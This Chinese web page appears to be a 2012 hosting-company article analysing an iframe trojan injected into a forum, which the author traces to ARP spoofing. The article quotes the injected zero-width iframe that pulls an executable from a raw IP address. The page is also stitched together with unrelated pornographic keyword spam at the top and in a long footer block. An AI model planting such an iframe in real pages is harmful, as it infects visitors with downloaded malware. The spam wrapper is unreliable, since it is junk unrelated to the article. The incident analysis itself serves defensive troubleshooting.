久久精品一区二区三区中文字幕-久久精品一区二区三区日韩-久久精品一区二区三区不卡-久久精品一区二区国产-久久精品一区二区-久久精品一级

行業動態
服務器掛iframe木馬分析
發布日期:2012-11-26 閱讀次數:5710 字體大小:

  昨日接到某論壇的求助,論壇中被掛iframe木馬,當訪問論壇時發現每個頁面的置頂有個iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動提示有木馬,系統會彈出一個載下h.exe的對話框。由于論壇是當天剛出現的情況,服務器中就放置了一個論壇,分析有可能有以下幾種情況。

  1.  論壇被攻擊
  2.  IIS被置入木馬
  3.  ARP攻擊

  針對第一種情況找到論壇中改過的文件與模板,并未發現相關被篡改的內容,第一種情況排除。接下來接以下兩種思路來尋找解決方法,在論壇中新建兩個文件,一個是1.html、一個是1.php 無需輸入內容。通過論壇網址訪問  網址/1.html 訪問此頁面沒發現異常、訪問1.php發現被自動掛馬,也就是說當運行PHP的文件時會自動掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會出現以上的情況)按IIS的配置進行查找也未發現問題。

  懷疑可能是服務器所在的局域網或網絡有ARP攻擊,從網上下載一個ARP防火墻后重啟服務器,發現問題解決,每個頁面中已經沒有iframe的木馬。訪問論壇首頁和原建立的1.php頁面也已正常。但訪問論壇子頁時360仍提示有木馬,但子頁的代碼已無iframe的內容。這種情況可能是論壇訪問過大,多用戶同時訪問子頁,360有云計算會將原有木馬的網站或頁面自動提交到云服務器中,以致及時清除木馬后360的云服務器還沒有反映過來才出現的誤報情況。

  在些易天科技提示服務器管理員除作好站點的安全防范外,應對服務器作相關的安全設置。安裝必要的軟件。

主站蜘蛛池模板: 精品一区二区三区波多野结衣 | 99久久伊人一区二区yy5099 | 好大好硬视频 | 国产亚洲精品九九久在线观看 | 精品久久99麻豆蜜桃666 | 短篇最污的乱淫伦小说全集 | 久久99re热在线播放7 | 91最新国产 | 99在线精品免费视频九九视 | 欧美一级欧美一级高清 | 丝袜兔女郎被啪在线观看91 | 午夜AV内射一区二区三区红桃视 | 2019年国产高清情侣视频 | 精品视频久久久久 | 亚洲欧美精品一区天堂久久 | igao网果冻传媒 | 精品一区二区三区视频日产 | 校园春色偷拍自拍 | 亚洲成人精品久久 | 人成网站在线观看 | 成人综合网站 | 免费观看的毛片 | 婷婷色天使在线视频观看 | 日本福利片国产午夜久久 | 久久精品无码人妻无码AV蜜臀 | 日本福利视频网站 | 免费观看伦理片 | 武侠古典久久亚洲精品 | 精品久久久久免费极品大片 | 日韩毛片在线影视 | 免费看一级毛片 | 黑人同学征服教师麻麻 | 91九色国产porny | 国产欧美二区三区 | 特级毛片免费视频观看 | 无人在线观看免费高清视频播放 | 天天舔天天操天天干 | 久久视频在线视频 | 日本xxx18hd| 金发美女与黑人做爰 | 亚偷熟乱区视频在线观看 |